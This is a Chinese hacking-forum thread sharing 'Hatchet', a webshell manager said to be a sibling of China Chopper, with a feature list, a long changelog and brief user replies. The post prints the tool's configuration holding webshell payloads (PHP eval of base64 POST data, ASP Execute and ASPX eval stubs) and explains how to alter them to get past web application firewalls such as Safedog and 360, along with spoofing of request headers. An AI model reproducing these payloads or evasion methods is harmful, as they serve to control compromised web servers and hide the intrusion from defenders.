查看: 205993|回复: 160

[工具专区] 中国菜刀Chopper的兄弟==斧头Hatchet 过狗.无后门

  [复制链接]
  • TA的每日心情
    擦汗
    2016-6-20 20:37
  • 签到天数: 13 天

    [LV.3]偶尔看看II

    发表于 2014-5-24 15:47:34 | 显示全部楼层 |阅读模式
    本帖最后由 kali 于 2014-5-24 15:46 编辑

    收集自网络...原作者不详...过狗.无后门..持续更新...使用与菜刀类同.
    先看几张图....

    QQ图片20140524152801.jpg
    QQ图片20140524152843.jpg
    QQ图片.jpg

    优点:
            持续更新
            快捷键操作
            注册表读取
            HTTP头自行控制
            POST部分数据可自定义,突破安全狗等WAF(一句话需自行处理)
            PHP Warning 警告去除,避免某些WAF等记录
            PHP支持多种执行命令,安全模式也能执行
            PHP管理PostgreSQL、ODBC_MSSQL数据库
            HTTP代理,只完成PHP。支持HTTP[S] GET POST
            文件夹双击进入,树形框的上一层可以点击
            COMBO历史记录
            支持选择数据库后直接执行SQL命令
            数据库导出支持自定义分隔符
            数据库右键获取20条记录
            支持JSP上传
            文件[夹]剪切(文件移动机制秒移)
            文件[夹]多选删除
            文件[夹]多选下载
            应该来说不会崩溃

    后门:
            缩小体积已加UPX壳
            绝无有意添加的后门,但三流的业余技能不排除被远程溢出的BUG
            文件: C:\Projects\Hatchet\release\Hatchet.exe
            大小: 230400 字节
            文件版本: 1.0.0.1
            修改时间: 2014年5月21日, 16:37:00
            MD5: 93388C7197382959D67D074BD129C761
            SHA1: E90588FED519DEB4E1898BA0FD61F8778386487F
            CRC32: 55A26050

    /*
            [Header]
            User-Agent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
            Referer=1
            X-Forwarded-For=1
            [/Header]
            [Headers]
            Accept-Language: en-us
            Content-Type: application/x-www-form-urlencoded
            [/Headers]
            [POST]
            ASP_POST_DATA==Execute("Execute(""On+Error+Resume+Next:Response.Clear:

            ASPX_POST_DATA==Response.Write("->|");var err:Exception;try{eval(System.Text.Encoding.GetEncoding(%nPageCode%).GetString(System.Convert.FromBase64String("%szBase64EvalCode%")),"unsafe");}catch(err){Response.Write("ERROR:// "%2Berr.message);}Response.Write("|<-");Response.End();

            PHP_POST_DATA==@eval(base64_decode($_POST[z0]));&z0=

            PHP_POST_Z0_DATA=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);
            [/POST]

            ##################################################
            #以下是说明
            请严格保持该格式,大小写不一样
            Referer 为1 则程序自动添加
            X-Forwarded-For 为1 则程序自动随机生成添加
            如果要自己手动添加其固定值,请设为0,后在[Headers]里添加即可。
            [POST]里为POST的部分数据,可自行变异这段代码,过安全狗等,很灵活的哦~
            %nPageCode% 为程序需要处理的编码,请保留
            %szBase64EvalCode% 为程序需要处理的执行代码,请保留
    */

    ------------------------------------------------------------
    2013.12.03
    *        本地数据库单引号
    *        CMD选择所有,任意键覆盖
    +        FileSave CTRL+A

    2013.12.07
    *        JSP 传递没有 UrlEnCode
    +        增加文件夹下载
    *        站点管理,光标URL全选
    *        szMyBase64Encode.Replace("+","%2B");

    2013.12.09
    +        增加 HTTP 错误显示
    *        修正下载目录,win linux / \
    *        修正'\0'格式化发生的截断

    2013.12.10
    +        TAB标签OK
    *        ASPX脚本编码

    2013.12.11
    *        TAB的X范围加大
    +        PHP脚本过安全狗

    2013.12.12
    *        eval preg_replace均可以使用过狗版本        chr(45).
    +        稍微完善一下状态栏

    2013.12.13
    *        下载、上传文件开启一个新线程

    2013.12.18
    +        asp        \r\nOn+Error        过狗
    +        aspx        var err\r\n        过狗
    *        Shell类型编辑时,内容一样不更新
    *        文件管理重命名、更改时间,内容一样不更新
    +        快捷键 F2 文件管理重命名

    2013.12.19
    +        增加自写代码
    +        增加HTTP头 INI里配置(在主界面右键里,如果文件不存在,第一次自动生成)

    2013.12.21
    *        修正文件内容Linux(\n)换行显示
    +        文件内容 Ctrl+F 查找
    *        修正多线程,随机IP都一样
    *        PHP Warning 警告去除
    +        自写代码快捷键 Ctrl+A,F5执行

    2013.12.23
    +        增加右键数据库查询结果导出TXT,默认每一个字段用一个【TAB】分开,如果需要用其他字符请在填写保存文件名的时候,后面加上&&,紧跟分隔符。如: table.txt&&,
    +        增加数据库执行SQL查询时,直接导出到本地文件,不显示到列表框。SQL命令后面加上--file:紧跟要导出到的文件名。如: Select * From Members Limit 0,20--file:1.txt
    *        数据库查询结果显示,计算错误的小Bug
    *        数据库错误显示的问题

    2013.12.24
    *        UTF8 GBK互换的BUG

    2013.12.27
    +        增加连接数据库代码实例
    +        增加命令执行方式(system,passthru,shell_exec,exec,WScript.shell)

    2013.12.29
    +        增加PHP管理PostgreSQL数据库
    *        PHP MySQL少写z1=

    2014.01.04
    +        增加PHP管理ODBC_MSSQL数据库

    2014.01.07
    *        数据库导出HTML编码设置charset=GBK
    *        JSP查询数据库错误不弹AfxMessageBox

    2014.01.08
    +        Shell列表排序
    *        Shell日期的月份日期添加前导零
    *        修正上传文件大小限制

    2014.01.09
    *        修正CMD,cls清空后上下箭头还原旧内容

    2014.01.10
    +        显示下载进度大小
    *        选择保存文件夹可删除|OFN_NOCHANGEDIR
    +        文件下载完成,自动打开文件夹选定文件。

    2014.01.14 感谢luoye
    *        文件管理路径处理问题。防止调皮的伙伴C:\\\\\\\\\\\\或C://////////或C:
    *        JSP db2连接例子有误password=123456;后面有分号。

    2014.01.24
    +        增加标题栏右键系统菜单
    +        记忆选择标签,文件管理,文件内容管理,内容关闭,回到文件管理
    *        路途再远,也要回家。小伙伴们春节快乐!!!

    2014.02.11
    *        运行软件,如果存在INI,自动加载。之前需要右键才会加载。OnMainUpdateIni(bool bNoCreat=true);
    +        过360网站卫士
    +        POST前一小段数据可在INI里自定义,经研究可突破安全狗等WAF。
            "=Execute(\"Execute(\"\"On+Error+Resume+Next: ==> Ini_szASP_POST_DATA + "
            "=%40eval%09%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0= ==> Ini_szPHP_POST_DATA + "

    2014.02.21
    +        数据库和文件管理树形框就地编辑,只是方便复制内容,不会改变服务器。
    *        修正获取列表框的小问题。GetNextItem < 0 return;
    +        增加文件复制,文件剪切(仅PHP)

    2014.02.22
    +        增加文件剪切(ASP ASPX JSP)

    2014.03.05
    *        修正PreTranslateMessage事件处理忘记及时返回
    *        修正文件管理,后续增加的映射磁盘网络磁盘等,显示会有问题。

    2014.03.17
    *        某种原因,更改软件名称: Hatchet
    +        增加POST的z0前部分自定义,突破安全宝的Base64关键词。
    *        修正CMD框,等宽字体,对齐的问题。

    2014.03.18
    *        修正CMD返回路径的截取问题
    *        修正代码执行,等宽字体,对齐的问题。
    *        修正获取文件内容,等宽字体,对齐的问题。
    +        增加部分多线程,不卡界面。
    +        增加代码执行导出导入。

    2014.04.01
    *        界面大改动(非常感谢p1n9y_fly)
    +        增加大部分多线程
    +        增加部分快捷键

    2014.04.02
    *        再次修正随机IP都一样
    -        取消自动添加Cookie,导致INI里填的Cookie不能被添加上 INTERNET_FLAG_NO_COOKIES
    +        增加快捷键 Ctrl+V
    +        增加系统托盘
    *        文件内容保存线程变量未初始化(感谢Xi总)
    *        修正重命名、新建目录,如果文件[夹]存在,覆盖。(感谢Xi总)

    2014.04.04
    +        增加上传文件后自动刷新列表
    *        修正PHP文件[夹]可读可写标注。换成is_readable is_writable(感谢敌敌喂)
    *        修正树形框,判断给定树项是否包含子项,2014.04.04 BUG,有子项,不一定已经存在(感谢敌敌喂)
    *        修正文件管理C:\/\/\/\/这种路径
    *        修正CMD Ctrl+V
    +        增加Shell列表快捷键 Insert(添加) Delete(删除) Enter(编辑)
    +        增加文件管理列表快捷键,回车进入文件夹或者文件内容编辑。

    2014.04.07
    *        增强多文件处理
    *        修正文件管理树形框小问题
    *        更换文件管理EDIT->COMBO
    +        增加注册表管理

    2014.04.14
    +        增加注册表本地缓存
    +        稍微完善一下状态栏
    *        修正asp数据库截取的BUG(感谢Ciph2r)
    *        修正编辑的对话框显示位置问题
    +        增加COMBO记录

    2014.05.07
    +        增加显示版本
    *        修正CMD        cls保留系统信息
    +        增加CMD        Please wait...
    +        增加数据库右键查询20条
    +        增加数据库ESC取消编辑
    *        修正文件图标szIcoTemp变量忘记初始化
    +        文件管理,回车或双击的文件如果是以下弹出下载
                    .jpg.gif.png.bmp.jpeg.ico
                    .zip.rar.tgz.7z.tar.gz.iso.cab.bz2.jar.dmg
                    .exe.msi.dll.sys.avi.mpeg.mpg.vob.rmvb.wmv.mp3.mp4.3gp.ogg.voc
                    .swf.pdf.flv.fla.psd.doc.docx.xls.xlsx.ppt.pptx.mdb.rtf

    2014.05.09
    +        主页增加复制URL地址(Ctrl+C)
    *        文件夹双击进入,树形框跟进(感谢Lee Swagger)
    *        文件夹双击进入,树形框选择项并没有改变。SelectItem执行失败,换OnNMClickTree判断
    +        增加ASPX POST数据INI自定义
    *        MYSQL如有不正常的表名,中文、空格等,请用`包含表名(感谢Hancock)

    2014.05.21
    +        增加全部EDIT,CTRL+A
    *        修正MAIN IDC_EDIT_FIND,大小改变,被覆盖隐藏
    +        增加Wget线程
    *        修正数据库显示结果,编码问题导致的死循环
    *        修正asp特殊环境缓存的问题。Response.Clear
    *        修正asp数据库SI变量初始化
    +        优化数据库返回的列表宽度

    下载地址
    游客,如果您要查看本帖隐藏内容请回复

    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    2016-6-20 20:37
  • 签到天数: 13 天

    [LV.3]偶尔看看II

     楼主| 发表于 2014-5-24 16:08:14 | 显示全部楼层
    沙发..
    回复

    使用道具 举报

    该用户从未签到

    发表于 2014-5-24 16:42:28 | 显示全部楼层
    拿走了~
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2018-8-22 12:07
  • 签到天数: 17 天

    [LV.4]偶尔看看III

    发表于 2014-5-24 16:44:24 | 显示全部楼层
    看起来很屌啊。。。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2023-4-12 21:54
  • 签到天数: 404 天

    [LV.9]以坛为家II

    发表于 2014-5-24 16:45:34 | 显示全部楼层
    下载 试试看 好不
    回复 支持 反对

    使用道具 举报

    头像被屏蔽

    该用户从未签到

    发表于 2014-5-24 17:17:16 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2023-4-26 23:35
  • 签到天数: 237 天

    [LV.7]常住居民III

    发表于 2014-5-24 17:55:34 | 显示全部楼层
    看起来很吊啊         
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-6-7 21:48
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2014-5-24 18:20:57 | 显示全部楼层
    JSP连接出现500

    不知道你们是否遇到这个问题?
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-5-24 21:06:50 | 显示全部楼层
    不错                                 
    回复 支持 反对

    使用道具 举报

    头像被屏蔽

    该用户从未签到

    发表于 2014-5-24 23:53:53 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 02:50 , Processed in 0.042307 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部